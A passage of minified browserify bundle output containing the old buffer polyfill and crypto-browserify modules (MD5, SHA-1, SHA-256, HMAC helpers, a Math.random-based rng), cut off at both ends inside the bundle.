window?window:{},e("buffer").Buffer,arguments[3],arguments[4],arguments[5],arguments[6],"/node_modules/gulp-browserify/node_modules/base64-js/lib/b64.js","/node_modules/gulp-browserify/node_modules/base64-js/lib")},{buffer:3,lYpoI2:10}],3:[function(O,e,H){(function(e,t,h,n,r,o,i,u,a){var s=O("base64-js"),f=O("ieee754");function h(e,t,n){if(!(this instanceof h))return new h(e,t,n);var r,o,i,u,a,s=typeof e;if("base64"===t&amp;&amp;"string"==s)for(e=(r=e).trim?r.trim():r.replace(/^\s+|\s+$/g,"");e.length%4!=0;)e+="=";if("number"==s)o=x(e);else if("string"==s)o=h.byteLength(e,t);else{if("object"!=s)throw new Error("First argument needs to be a number, array or string.");o=x(e.length)}if(h._useTypedArrays?i=h._augment(new Uint8Array(o)):((i=this).length=o,i._isBuffer=!0),h._useTypedArrays&amp;&amp;"number"==typeof e.byteLength)i._set(e);else if(S(a=e)||h.isBuffer(a)||a&amp;&amp;"object"==typeof a&amp;&amp;"number"==typeof a.length)for(u=0;u&lt;o;u++)h.isBuffer(e)?i[u]=e.readUInt8(u):i[u]=e[u];else if("string"==s)i.write(e,0,t);else if("number"==s&amp;&amp;!h._useTypedArrays&amp;&amp;!n)for(u=0;u&lt;o;u++)i[u]=0;return i}function p(e,t,n,r){return h._charsWritten=T(function(e){for(var t=[],n=0;n&lt;e.length;n++)t.push(255&amp;e.charCodeAt(n));return t}(t),e,n,r)}function g(e,t,n,r){return h._charsWritten=T(function(e){for(var t,n,r,o=[],i=0;i&lt;e.length;i++)t=e.charCodeAt(i),n=t&gt;&gt;8,r=t%256,o.push(r),o.push(n);return o}(t),e,n,r)}function c(e,t,n){var r="";n=Math.min(e.length,n);for(var o=t;o&lt;n;o++)r+=String.fromCharCode(e[o]);return r}function l(e,t,n,r){r||(D("boolean"==typeof n,"missing or invalid endian"),D(null!=t,"missing offset"),D(t+1&lt;e.length,"Trying to read beyond buffer length"));var o,i=e.length;if(!(i&lt;=t))return n?(o=e[t],t+1&lt;i&amp;&amp;(o|=e[t+1]&lt;&lt;8)):(o=e[t]&lt;&lt;8,t+1&lt;i&amp;&amp;(o|=e[t+1])),o}function d(e,t,n,r){r||(D("boolean"==typeof n,"missing or invalid endian"),D(null!=t,"missing offset"),D(t+3&lt;e.length,"Trying to read beyond buffer length"));var o,i=e.length;if(!(i&lt;=t))return n?(t+2&lt;i&amp;&amp;(o=e[t+2]&lt;&lt;16),t+1&lt;i&amp;&amp;(o|=e[t+1]&lt;&lt;8),o|=e[t],t+3&lt;i&amp;&amp;(o+=e[t+3]&lt;&lt;24&gt;&gt;&gt;0)):(t+1&lt;i&amp;&amp;(o=e[t+1]&lt;&lt;16),t+2&lt;i&amp;&amp;(o|=e[t+2]&lt;&lt;8),t+3&lt;i&amp;&amp;(o|=e[t+3]),o+=e[t]&lt;&lt;24&gt;&gt;&gt;0),o}function y(e,t,n,r){if(r||(D("boolean"==typeof n,"missing or invalid endian"),D(null!=t,"missing offset"),D(t+1&lt;e.length,"Trying to read beyond buffer length")),!(e.length&lt;=t)){var o=l(e,t,n,!0);return 32768&amp;o?-1*(65535-o+1):o}}function w(e,t,n,r){if(r||(D("boolean"==typeof n,"missing or invalid endian"),D(null!=t,"missing offset"),D(t+3&lt;e.length,"Trying to read beyond buffer length")),!(e.length&lt;=t)){var o=d(e,t,n,!0);return 2147483648&amp;o?-1*(4294967295-o+1):o}}function b(e,t,n,r){return r||(D("boolean"==typeof n,"missing or invalid endian"),D(t+3&lt;e.length,"Trying to read beyond buffer length")),f.read(e,t,n,23,4)}function m(e,t,n,r){return r||(D("boolean"==typeof n,"missing or invalid endian"),D(t+7&lt;e.length,"Trying to read beyond buffer length")),f.read(e,t,n,52,8)}function v(e,t,n,r,o){o||(D(null!=t,"missing value"),D("boolean"==typeof r,"missing or invalid endian"),D(null!=n,"missing offset"),D(n+1&lt;e.length,"trying to write beyond buffer length"),N(t,65535));var i=e.length;if(!(i&lt;=n))for(var u=0,a=Math.min(i-n,2);u&lt;a;u++)e[n+u]=(t&amp;255&lt;&lt;8*(r?u:1-u))&gt;&gt;&gt;8*(r?u:1-u)}function _(e,t,n,r,o){o||(D(null!=t,"missing value"),D("boolean"==typeof r,"missing or invalid endian"),D(null!=n,"missing offset"),D(n+3&lt;e.length,"trying to write beyond buffer length"),N(t,4294967295));var i=e.length;if(!(i&lt;=n))for(var u=0,a=Math.min(i-n,4);u&lt;a;u++)e[n+u]=t&gt;&gt;&gt;8*(r?u:3-u)&amp;255}function E(e,t,n,r,o){o||(D(null!=t,"missing value"),D("boolean"==typeof r,"missing or invalid endian"),D(null!=n,"missing offset"),D(n+1&lt;e.length,"Trying to write beyond buffer length"),Y(t,32767,-32768)),e.length&lt;=n||v(e,0&lt;=t?t:65535+t+1,n,r,o)}function I(e,t,n,r,o){o||(D(null!=t,"missing value"),D("boolean"==typeof r,"missing or invalid endian"),D(null!=n,"missing offset"),D(n+3&lt;e.length,"Trying to write beyond buffer length"),Y(t,2147483647,-2147483648)),e.length&lt;=n||_(e,0&lt;=t?t:4294967295+t+1,n,r,o)}function A(e,t,n,r,o){o||(D(null!=t,"missing value"),D("boolean"==typeof r,"missing or invalid endian"),D(null!=n,"missing offset"),D(n+3&lt;e.length,"Trying to write beyond buffer length"),F(t,34028234663852886e22,-34028234663852886e22)),e.length&lt;=n||f.write(e,t,n,r,23,4)}function B(e,t,n,r,o){o||(D(null!=t,"missing value"),D("boolean"==typeof r,"missing or invalid endian"),D(null!=n,"missing offset"),D(n+7&lt;e.length,"Trying to write beyond buffer length"),F(t,17976931348623157e292,-17976931348623157e292)),e.length&lt;=n||f.write(e,t,n,r,52,8)}H.Buffer=h,H.SlowBuffer=h,H.INSPECT_MAX_BYTES=50,h.poolSize=8192,h._useTypedArrays=function(){try{var e=new ArrayBuffer(0),t=new Uint8Array(e);return t.foo=function(){return 42},42===t.foo()&amp;&amp;"function"==typeof t.subarray}catch(e){return!1}}(),h.isEncoding=function(e){switch(String(e).toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"binary":case"base64":case"raw":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return!0;default:return!1}},h.isBuffer=function(e){return!(null==e||!e._isBuffer)},h.byteLength=function(e,t){var n;switch(e+="",t||"utf8"){case"hex":n=e.length/2;break;case"utf8":case"utf-8":n=C(e).length;break;case"ascii":case"binary":case"raw":n=e.length;break;case"base64":n=k(e).length;break;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":n=2*e.length;break;default:throw new Error("Unknown encoding")}return n},h.concat=function(e,t){if(D(S(e),"Usage: Buffer.concat(list, [totalLength])\nlist should be an Array."),0===e.length)return new h(0);if(1===e.length)return e[0];var n;if("number"!=typeof t)for(n=t=0;n&lt;e.length;n++)t+=e[n].length;var r=new h(t),o=0;for(n=0;n&lt;e.length;n++){var i=e[n];i.copy(r,o),o+=i.length}return r},h.prototype.write=function(e,t,n,r){if(isFinite(t))isFinite(n)||(r=n,n=void 0);else{var o=r;r=t,t=n,n=o}t=Number(t)||0;var i,u,a,s,f,c,l,d=this.length-t;switch((!n||d&lt;(n=Number(n)))&amp;&amp;(n=d),r=String(r||"utf8").toLowerCase()){case"hex":i=function(e,t,n,r){n=Number(n)||0;var o=e.length-n;(!r||o&lt;(r=Number(r)))&amp;&amp;(r=o);var i=t.length;D(i%2==0,"Invalid hex string"),i/2&lt;r&amp;&amp;(r=i/2);for(var u=0;u&lt;r;u++){var a=parseInt(t.substr(2*u,2),16);D(!isNaN(a),"Invalid hex string"),e[n+u]=a}return h._charsWritten=2*u,u}(this,e,t,n);break;case"utf8":case"utf-8":f=this,c=t,l=n,i=h._charsWritten=T(C(e),f,c,l);break;case"ascii":i=p(this,e,t,n);break;case"binary":i=p(this,e,t,n);break;case"base64":u=this,a=t,s=n,i=h._charsWritten=T(k(e),u,a,s);break;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":i=g(this,e,t,n);break;default:throw new Error("Unknown encoding")}return i},h.prototype.toString=function(e,t,n){var r,o,i,u,a=this;if(e=String(e||"utf8").toLowerCase(),t=Number(t)||0,(n=void 0!==n?Number(n):n=a.length)===t)return"";switch(e){case"hex":r=function(e,t,n){var r=e.length;(!t||t&lt;0)&amp;&amp;(t=0);(!n||n&lt;0||r&lt;n)&amp;&amp;(n=r);for(var o="",i=t;i&lt;n;i++)o+=j(e[i]);return o}(a,t,n);break;case"utf8":case"utf-8":r=function(e,t,n){var r="",o="";n=Math.min(e.length,n);for(var i=t;i&lt;n;i++)e[i]&lt;=127?(r+=M(o)+String.fromCharCode(e[i]),o=""):o+="%"+e[i].toString(16);return r+M(o)}(a,t,n);break;case"ascii":r=c(a,t,n);break;case"binary":r=c(a,t,n);break;case"base64":o=a,u=n,r=0===(i=t)&amp;&amp;u===o.length?s.fromByteArray(o):s.fromByteArray(o.slice(i,u));break;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":r=function(e,t,n){for(var r=e.slice(t,n),o="",i=0;i&lt;r.length;i+=2)o+=String.fromCharCode(r[i]+256*r[i+1]);return o}(a,t,n);break;default:throw new Error("Unknown encoding")}return r},h.prototype.toJSON=function(){return{type:"Buffer",data:Array.prototype.slice.call(this._arr||this,0)}},h.prototype.copy=function(e,t,n,r){if(n=n||0,r||0===r||(r=this.length),t=t||0,r!==n&amp;&amp;0!==e.length&amp;&amp;0!==this.length){D(n&lt;=r,"sourceEnd &lt; sourceStart"),D(0&lt;=t&amp;&amp;t&lt;e.length,"targetStart out of bounds"),D(0&lt;=n&amp;&amp;n&lt;this.length,"sourceStart out of bounds"),D(0&lt;=r&amp;&amp;r&lt;=this.length,"sourceEnd out of bounds"),r&gt;this.length&amp;&amp;(r=this.length),e.length-t&lt;r-n&amp;&amp;(r=e.length-t+n);var o=r-n;if(o&lt;100||!h._useTypedArrays)for(var i=0;i&lt;o;i++)e[i+t]=this[i+n];else e._set(this.subarray(n,n+o),t)}},h.prototype.slice=function(e,t){var n=this.length;if(e=U(e,n,0),t=U(t,n,n),h._useTypedArrays)return h._augment(this.subarray(e,t));for(var r=t-e,o=new h(r,void 0,!0),i=0;i&lt;r;i++)o[i]=this[i+e];return o},h.prototype.get=function(e){return console.log(".get() is deprecated. Access using array indexes instead."),this.readUInt8(e)},h.prototype.set=function(e,t){return console.log(".set() is deprecated. Access using array indexes instead."),this.writeUInt8(e,t)},h.prototype.readUInt8=function(e,t){if(t||(D(null!=e,"missing offset"),D(e&lt;this.length,"Trying to read beyond buffer length")),!(e&gt;=this.length))return this[e]},h.prototype.readUInt16LE=function(e,t){return l(this,e,!0,t)},h.prototype.readUInt16BE=function(e,t){return l(this,e,!1,t)},h.prototype.readUInt32LE=function(e,t){return d(this,e,!0,t)},h.prototype.readUInt32BE=function(e,t){return d(this,e,!1,t)},h.prototype.readInt8=function(e,t){if(t||(D(null!=e,"missing offset"),D(e&lt;this.length,"Trying to read beyond buffer length")),!(e&gt;=this.length))return 128&amp;this[e]?-1*(255-this[e]+1):this[e]},h.prototype.readInt16LE=function(e,t){return y(this,e,!0,t)},h.prototype.readInt16BE=function(e,t){return y(this,e,!1,t)},h.prototype.readInt32LE=function(e,t){return w(this,e,!0,t)},h.prototype.readInt32BE=function(e,t){return w(this,e,!1,t)},h.prototype.readFloatLE=function(e,t){return b(this,e,!0,t)},h.prototype.readFloatBE=function(e,t){return b(this,e,!1,t)},h.prototype.readDoubleLE=function(e,t){return m(this,e,!0,t)},h.prototype.readDoubleBE=function(e,t){return m(this,e,!1,t)},h.prototype.writeUInt8=function(e,t,n){n||(D(null!=e,"missing value"),D(null!=t,"missing offset"),D(t&lt;this.length,"trying to write beyond buffer length"),N(e,255)),t&gt;=this.length||(this[t]=e)},h.prototype.writeUInt16LE=function(e,t,n){v(this,e,t,!0,n)},h.prototype.writeUInt16BE=function(e,t,n){v(this,e,t,!1,n)},h.prototype.writeUInt32LE=function(e,t,n){_(this,e,t,!0,n)},h.prototype.writeUInt32BE=function(e,t,n){_(this,e,t,!1,n)},h.prototype.writeInt8=function(e,t,n){n||(D(null!=e,"missing value"),D(null!=t,"missing offset"),D(t&lt;this.length,"Trying to write beyond buffer length"),Y(e,127,-128)),t&gt;=this.length||(0&lt;=e?this.writeUInt8(e,t,n):this.writeUInt8(255+e+1,t,n))},h.prototype.writeInt16LE=function(e,t,n){E(this,e,t,!0,n)},h.prototype.writeInt16BE=function(e,t,n){E(this,e,t,!1,n)},h.prototype.writeInt32LE=function(e,t,n){I(this,e,t,!0,n)},h.prototype.writeInt32BE=function(e,t,n){I(this,e,t,!1,n)},h.prototype.writeFloatLE=function(e,t,n){A(this,e,t,!0,n)},h.prototype.writeFloatBE=function(e,t,n){A(this,e,t,!1,n)},h.prototype.writeDoubleLE=function(e,t,n){B(this,e,t,!0,n)},h.prototype.writeDoubleBE=function(e,t,n){B(this,e,t,!1,n)},h.prototype.fill=function(e,t,n){if(e=e||0,t=t||0,n=n||this.length,"string"==typeof e&amp;&amp;(e=e.charCodeAt(0)),D("number"==typeof e&amp;&amp;!isNaN(e),"value is not a number"),D(t&lt;=n,"end &lt; start"),n!==t&amp;&amp;0!==this.length){D(0&lt;=t&amp;&amp;t&lt;this.length,"start out of bounds"),D(0&lt;=n&amp;&amp;n&lt;=this.length,"end out of bounds");for(var r=t;r&lt;n;r++)this[r]=e}},h.prototype.inspect=function(){for(var e=[],t=this.length,n=0;n&lt;t;n++)if(e[n]=j(this[n]),n===H.INSPECT_MAX_BYTES){e[n+1]="...";break}return"&lt;Buffer "+e.join(" ")+"&gt;"},h.prototype.toArrayBuffer=function(){if("undefined"==typeof Uint8Array)throw new Error("Buffer.toArrayBuffer not supported in this browser");if(h._useTypedArrays)return new h(this).buffer;for(var e=new Uint8Array(this.length),t=0,n=e.length;t&lt;n;t+=1)e[t]=this[t];return e.buffer};var L=h.prototype;function U(e,t,n){return"number"!=typeof e?n:t&lt;=(e=~~e)?t:0&lt;=e||0&lt;=(e+=t)?e:0}function x(e){return(e=~~Math.ceil(+e))&lt;0?0:e}function S(e){return(Array.isArray||function(e){return"[object Array]"===Object.prototype.toString.call(e)})(e)}function j(e){return e&lt;16?"0"+e.toString(16):e.toString(16)}function C(e){for(var t=[],n=0;n&lt;e.length;n++){var r=e.charCodeAt(n);if(r&lt;=127)t.push(e.charCodeAt(n));else{var o=n;55296&lt;=r&amp;&amp;r&lt;=57343&amp;&amp;n++;for(var i=encodeURIComponent(e.slice(o,n+1)).substr(1).split("%"),u=0;u&lt;i.length;u++)t.push(parseInt(i[u],16))}}return t}function k(e){return s.toByteArray(e)}function T(e,t,n,r){for(var o=0;o&lt;r&amp;&amp;!(o+n&gt;=t.length||o&gt;=e.length);o++)t[o+n]=e[o];return o}function M(e){try{return decodeURIComponent(e)}catch(e){return String.fromCharCode(65533)}}function N(e,t){D("number"==typeof e,"cannot write a non-number as a number"),D(0&lt;=e,"specified a negative value for writing an unsigned value"),D(e&lt;=t,"value is larger than maximum value for type"),D(Math.floor(e)===e,"value has a fractional component")}function Y(e,t,n){D("number"==typeof e,"cannot write a non-number as a number"),D(e&lt;=t,"value larger than maximum allowed value"),D(n&lt;=e,"value smaller than minimum allowed value"),D(Math.floor(e)===e,"value has a fractional component")}function F(e,t,n){D("number"==typeof e,"cannot write a non-number as a number"),D(e&lt;=t,"value larger than maximum allowed value"),D(n&lt;=e,"value smaller than minimum allowed value")}function D(e,t){if(!e)throw new Error(t||"Failed assertion")}h._augment=function(e){return e._isBuffer=!0,e._get=e.get,e._set=e.set,e.get=L.get,e.set=L.set,e.write=L.write,e.toString=L.toString,e.toLocaleString=L.toString,e.toJSON=L.toJSON,e.copy=L.copy,e.slice=L.slice,e.readUInt8=L.readUInt8,e.readUInt16LE=L.readUInt16LE,e.readUInt16BE=L.readUInt16BE,e.readUInt32LE=L.readUInt32LE,e.readUInt32BE=L.readUInt32BE,e.readInt8=L.readInt8,e.readInt16LE=L.readInt16LE,e.readInt16BE=L.readInt16BE,e.readInt32LE=L.readInt32LE,e.readInt32BE=L.readInt32BE,e.readFloatLE=L.readFloatLE,e.readFloatBE=L.readFloatBE,e.readDoubleLE=L.readDoubleLE,e.readDoubleBE=L.readDoubleBE,e.writeUInt8=L.writeUInt8,e.writeUInt16LE=L.writeUInt16LE,e.writeUInt16BE=L.writeUInt16BE,e.writeUInt32LE=L.writeUInt32LE,e.writeUInt32BE=L.writeUInt32BE,e.writeInt8=L.writeInt8,e.writeInt16LE=L.writeInt16LE,e.writeInt16BE=L.writeInt16BE,e.writeInt32LE=L.writeInt32LE,e.writeInt32BE=L.writeInt32BE,e.writeFloatLE=L.writeFloatLE,e.writeFloatBE=L.writeFloatBE,e.writeDoubleLE=L.writeDoubleLE,e.writeDoubleBE=L.writeDoubleBE,e.fill=L.fill,e.inspect=L.inspect,e.toArrayBuffer=L.toArrayBuffer,e}}).call(this,O("lYpoI2"),"undefined"!=typeof self?self:"undefined"!=typeof window?window:{},O("buffer").Buffer,arguments[3],arguments[4],arguments[5],arguments[6],"/node_modules/gulp-browserify/node_modules/buffer/index.js","/node_modules/gulp-browserify/node_modules/buffer")},{"base64-js":2,buffer:3,ieee754:11,lYpoI2:10}],4:[function(l,d,e){(function(e,t,u,n,r,o,i,a,s){u=l("buffer").Buffer;var f=4,c=new u(f);c.fill(0);d.exports={hash:function(e,t,n,r){return u.isBuffer(e)||(e=new u(e)),function(e,t,n){for(var r=new u(t),o=n?r.writeInt32BE:r.writeInt32LE,i=0;i&lt;e.length;i++)o.call(r,e[i],4*i,!0);return r}(t(function(e,t){if(e.length%f!=0){var n=e.length+(f-e.length%f);e=u.concat([e,c],n)}for(var r=[],o=t?e.readInt32BE:e.readInt32LE,i=0;i&lt;e.length;i+=f)r.push(o.call(e,i));return r}(e,r),8*e.length),n,r)}}}).call(this,l("lYpoI2"),"undefined"!=typeof self?self:"undefined"!=typeof window?window:{},l("buffer").Buffer,arguments[3],arguments[4],arguments[5],arguments[6],"/node_modules/gulp-browserify/node_modules/crypto-browserify/helpers.js","/node_modules/gulp-browserify/node_modules/crypto-browserify")},{buffer:3,lYpoI2:10}],5:[function(w,e,b){(function(e,t,a,n,r,o,i,u,s){a=w("buffer").Buffer;var f=w("./sha"),c=w("./sha256"),l=w("./rng"),d={sha1:f,sha256:c,md5:w("./md5")},h=64,p=new a(h);function g(e,r){var o=d[e=e||"sha1"],i=[];return o||y("algorithm:",e,"is not yet supported"),{update:function(e){return a.isBuffer(e)||(e=new a(e)),i.push(e),e.length,this},digest:function(e){var t=a.concat(i),n=r?function(e,t,n){a.isBuffer(t)||(t=new a(t)),a.isBuffer(n)||(n=new a(n)),t.length&gt;h?t=e(t):t.length&lt;h&amp;&amp;(t=a.concat([t,p],h));for(var r=new a(h),o=new a(h),i=0;i&lt;h;i++)r[i]=54^t[i],o[i]=92^t[i];var u=e(a.concat([r,n]));return e(a.concat([o,u]))}(o,r,t):o(t);return i=null,e?n.toString(e):n}}}function y(){var e=[].slice.call(arguments).join(" ");throw new Error([e,"we accept pull requests","http://github.com/dominictarr/crypto-browserify"].join("\n"))}p.fill(0),b.createHash=function(e){return g(e)},b.createHmac=function(e,t){return g(e,t)},b.randomBytes=function(e,t){if(!t||!t.call)return new a(l(e));try{t.call(this,void 0,new a(l(e)))}catch(e){t(e)}},function(e,t){for(var n in e)t(e[n],n)}(["createCredentials","createCipher","createCipheriv","createDecipher","createDecipheriv","createSign","createVerify","createDiffieHellman","pbkdf2"],function(e){b[e]=function(){y("sorry,",e,"is not implemented yet")}})}).call(this,w("lYpoI2"),"undefined"!=typeof self?self:"undefined"!=typeof window?window:{},w("buffer").Buffer,arguments[3],arguments[4],arguments[5],arguments[6],"/node_modules/gulp-browserify/node_modules/crypto-browserify/index.js","/node_modules/gulp-browserify/node_modules/crypto-browserify")},{"./md5":6,"./rng":7,"./sha":8,"./sha256":9,buffer:3,lYpoI2:10}],6:[function(w,b,e){(function(e,t,n,r,o,i,u,a,s){var f=w("./helpers");function c(e,t){e[t&gt;&gt;5]|=128&lt;&lt;t%32,e[14+(t+64&gt;&gt;&gt;9&lt;&lt;4)]=t;for(var n=1732584193,r=-271733879,o=-1732584194,i=271733878,u=0;u&lt;e.length;u+=16){var a=n,s=r,f=o,c=i;n=d(n,r,o,i,e[u+0],7,-680876936),i=d(i,n,r,o,e[u+1],12,-389564586),o=d(o,i,n,r,e[u+2],17,606105819),r=d(r,o,i,n,e[u+3],22,-1044525330),n=d(n,r,o,i,e[u+4],7,-176418897),i=d(i,n,r,o,e[u+5],12,1200080426),o=d(o,i,n,r,e[u+6],17,-1473231341),r=d(r,o,i,n,e[u+7],22,-45705983),n=d(n,r,o,i,e[u+8],7,1770035416),i=d(i,n,r,o,e[u+9],12,-1958414417),o=d(o,i,n,r,e[u+10],17,-42063),r=d(r,o,i,n,e[u+11],22,-1990404162),n=d(n,r,o,i,e[u+12],7,1804603682),i=d(i,n,r,o,e[u+13],12,-40341101),o=d(o,i,n,r,e[u+14],17,-1502002290),n=h(n,r=d(r,o,i,n,e[u+15],22,1236535329),o,i,e[u+1],5,-165796510),i=h(i,n,r,o,e[u+6],9,-1069501632),o=h(o,i,n,r,e[u+11],14,643717713),r=h(r,o,i,n,e[u+0],20,-373897302),n=h(n,r,o,i,e[u+5],5,-701558691),i=h(i,n,r,o,e[u+10],9,38016083),o=h(o,i,n,r,e[u+15],14,-660478335),r=h(r,o,i,n,e[u+4],20,-405537848),n=h(n,r,o,i,e[u+9],5,568446438),i=h(i,n,r,o,e[u+14],9,-1019803690),o=h(o,i,n,r,e[u+3],14,-187363961),r=h(r,o,i,n,e[u+8],20,1163531501),n=h(n,r,o,i,e[u+13],5,-1444681467),i=h(i,n,r,o,e[u+2],9,-51403784),o=h(o,i,n,r,e[u+7],14,1735328473),n=p(n,r=h(r,o,i,n,e[u+12],20,-1926607734),o,i,e[u+5],4,-378558),i=p(i,n,r,o,e[u+8],11,-2022574463),o=p(o,i,n,r,e[u+11],16,1839030562),r=p(r,o,i,n,e[u+14],23,-35309556),n=p(n,r,o,i,e[u+1],4,-1530992060),i=p(i,n,r,o,e[u+4],11,1272893353),o=p(o,i,n,r,e[u+7],16,-155497632),r=p(r,o,i,n,e[u+10],23,-1094730640),n=p(n,r,o,i,e[u+13],4,681279174),i=p(i,n,r,o,e[u+0],11,-358537222),o=p(o,i,n,r,e[u+3],16,-722521979),r=p(r,o,i,n,e[u+6],23,76029189),n=p(n,r,o,i,e[u+9],4,-640364487),i=p(i,n,r,o,e[u+12],11,-421815835),o=p(o,i,n,r,e[u+15],16,530742520),n=g(n,r=p(r,o,i,n,e[u+2],23,-995338651),o,i,e[u+0],6,-198630844),i=g(i,n,r,o,e[u+7],10,1126891415),o=g(o,i,n,r,e[u+14],15,-1416354905),r=g(r,o,i,n,e[u+5],21,-57434055),n=g(n,r,o,i,e[u+12],6,1700485571),i=g(i,n,r,o,e[u+3],10,-1894986606),o=g(o,i,n,r,e[u+10],15,-1051523),r=g(r,o,i,n,e[u+1],21,-2054922799),n=g(n,r,o,i,e[u+8],6,1873313359),i=g(i,n,r,o,e[u+15],10,-30611744),o=g(o,i,n,r,e[u+6],15,-1560198380),r=g(r,o,i,n,e[u+13],21,1309151649),n=g(n,r,o,i,e[u+4],6,-145523070),i=g(i,n,r,o,e[u+11],10,-1120210379),o=g(o,i,n,r,e[u+2],15,718787259),r=g(r,o,i,n,e[u+9],21,-343485551),n=y(n,a),r=y(r,s),o=y(o,f),i=y(i,c)}return Array(n,r,o,i)}function l(e,t,n,r,o,i){return y((u=y(y(t,e),y(r,i)))&lt;&lt;(a=o)|u&gt;&gt;&gt;32-a,n);var u,a}function d(e,t,n,r,o,i,u){return l(t&amp;n|~t&amp;r,e,t,o,i,u)}function h(e,t,n,r,o,i,u){return l(t&amp;r|n&amp;~r,e,t,o,i,u)}function p(e,t,n,r,o,i,u){return l(t^n^r,e,t,o,i,u)}function g(e,t,n,r,o,i,u){return l(n^(t|~r),e,t,o,i,u)}function y(e,t){var n=(65535&amp;e)+(65535&amp;t);return(e&gt;&gt;16)+(t&gt;&gt;16)+(n&gt;&gt;16)&lt;&lt;16|65535&amp;n}b.exports=function(e){return f.hash(e,c,16)}}).call(this,w("lYpoI2"),"undefined"!=typeof self?self:"undefined"!=typeof window?window:{},w("buffer").Buffer,arguments[3],arguments[4],arguments[5],arguments[6],"/node_modules/gulp-browserify/node_modules/crypto-browserify/md5.js","/node_modules/gulp-browserify/node_modules/crypto-browserify")},{"./helpers":4,buffer:3,lYpoI2:10}],7:[function(e,l,t){(function(e,t,n,r,o,i,u,a,s){var f,c;f=function(e){for(var t,n=new Array(e),r=0;r&lt;e;r++)0==(3&amp;r)&amp;&amp;(t=4294967296*Math.random()),n[r]=t&gt;&gt;&gt;((3&amp;r)&lt;&lt;3)&amp;255;return n},l.exports=c||f}).call(this,e("lYpoI2"),"undefined"!=typeof self?self:"undefined"!=typeof window?window:{},e("buffer").Buffer,arguments[3],arguments[4],arguments[5],arguments[6],"/node_modules/gulp-browserify/node_modules/crypto-browserify/rng.js","/node_modules/gulp-browserify/node_modules/crypto-browserify")},{buffer:3,lYpoI2:10}],8:[function(l,d,e){(function(e,t,n,r,o,i,u,a,s){var f=l("./helpers");function c(e,t){e[t&gt;&gt;5]|=128&lt;&lt;24-t%32,e[15+(t+64&gt;&gt;9&lt;&lt;4)]=t;for(var n,r=Array(80),o=1732584193,i=-271733879,u=-1732584194,a=271733878,s=-1009589776,f=0;f&lt;e.length;f+=16){for(var c=o,l=i,d=u,h=a,p=s,g=0;g&lt;80;g++){r[g]=g&lt;16?e[f+g]:m(r[g-3]^r[g-8]^r[g-14]^r[g-16],1);var y=b(b(m(o,5),w(g,i,u,a)),b(b(s,r[g]),(n=g)&lt;20?1518500249:n&lt;40?1859775393:n&lt;60?-1894007588:-899497514));s=a,a=u,u=m(i,30),i=o,o=y}o=b(o,c),i=b(i,l),u=b(u,d),a=b(a,h),s=b(s,p)}return Array(o,i,u,a,s)}function w(e,t,n,r){return e&lt;20?t&amp;n|~t&amp;r:!(e&lt;40)&amp;&amp;e&lt;60?t&amp;n|t&amp;r|n&amp;r:t^n^r}function b(e,t){var n=(65535&amp;e)+(65535&amp;t);return(e&gt;&gt;16)+(t&gt;&gt;16)+(n&gt;&gt;16)&lt;&lt;16|65535&amp;n}function m(e,t){return e&lt;&lt;t|e&gt;&gt;&gt;32-t}d.exports=function(e){return f.hash(e,c,20,!0)}}).call(this,l("lYpoI2"),"undefined"!=typeof self?self:"undefined"!=typeof window?window:{},l("buffer").Buffer,arguments[3],arguments[4],arguments[5],arguments[6],"/node_modules/gulp-browserify/node_modules/crypto-browserify/sha.js","/node_modules/gulp-browserify/node_modules/crypto-browserify")},{"./helpers":4,buffer:3,lYpoI2:10}],9:[function(l,d,e){(function(e,t,n,r,o,i,u,a,s){function B(e,t){var n=(65535&amp;e)+(65535&amp;t);return(e&gt;&gt;16)+(t&gt;&gt;16)+(n&gt;&gt;16)&lt;&lt;16|65535&amp;n}function L(e,t){return e&gt;&gt;&gt;t|e&lt;&lt;32-t}function U(e,t){return e&gt;&gt;&gt;t}function f(e,t){var n,r,o,i,u,a,s,f,c,l,d,h,p,g,y,w,b,m,v=new Array(1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,2162078206,2614888103,3248222580,3835390401,4022224774,264347078,604807628,770255983,1249150122,1555081692,1996064986,2554220882,2821834349,2952996808,3210313671,3336571891,3584528711,113926993,338241895,666307205,773529912,1294757372,1396182291,1695183700,1986661051,2177026350,2456956037,2730485921,2820302411,3259730800,3345764771,3516065817,3600352804,4094571909,275423344,430227734,506948616,659060556,883997877,958139571,1322822218,1537002063,1747873779,1955562222,2024104815,2227730452,2361852424,2428436474,2756734187,3204031479,3329325298),_=new Array(1779033703,3144134277,1013904242,2773480762,1359893119,2600822924,528734635,1541459225),E=new Array(64);e[t&gt;&gt;5]|=128&lt;&lt;24-t%32,e[15+(t+64&gt;&gt;9&lt;&lt;4)]=t;for(var I=0;I&lt;e.length;I+=16){n=_[0],r=_[1],o=_[2],i=_[3],u=_[4],a=_[5],s=_[6],f=_[7];for(var A=0;A&lt;64;A++)E[A]=A&lt;16?e[A+I]:B(B(B((m=E[A-2],L(m,17)^L(m,19)^U(m,10)),E[A-7]),(b=E[A-15],L(b,7)^L(b,18)^U(b,3))),E[A-16]),c=B(B(B(B(f,L(w=u,6)^L(w,11)^L(w,25)),(y=u)&amp;a^~y&amp;s),v[A]),E[A]),l=B(L(g=n,2)^L(g,13)^L(g,22),(d=n)&amp;(h=r)^d&amp;(p=o)^h&amp;p),f=s,s=a,a=u,u=B(i,c),i=o,o=r,r=n,n=B(c,l);_[0]=B(n,_[0]),_[1]=B(r,_[1]),_[2]=B(o,_[2]),_[3]=B(i,_[3]),_[4]=B(u,_[4]),_[5]=B(a,_[5]),_[6]=B(s,_[6]),_[7]=B(f,_[7])}return _}var c=l("./helpers");d.exports=function(e){return c.hash(e,f,32,!0)}}).call(this,l("lYpoI2"),"undefined"!=typeof self?self:"undefined"!=typeof window?window:{},l("buffer").Buffer,arguments[3],arguments[4],arguments[5],arguments[6],"/node_modules/gulp-browserify/node_modules/crypto-browserify/sha256.js","/node_modules/gulp-browserify/node_modules/crypto-browserify")},{"./helpers":4,buffer:3,lYpoI2:10}],10:[function(e,c,t){(function(e,t,n,r,o,i,u,a,s){function f(){}(e=c.exports={}).nextTick=function(){var e="undefined"!=typeof window&amp;&amp;window.setImmediate,t="undefined"!=typeof window&amp;&amp;window.postMessage&amp;&amp;window.addEventListener;if(e)return function(e){return window.setImmediate(e)};if(t){var n=[];return 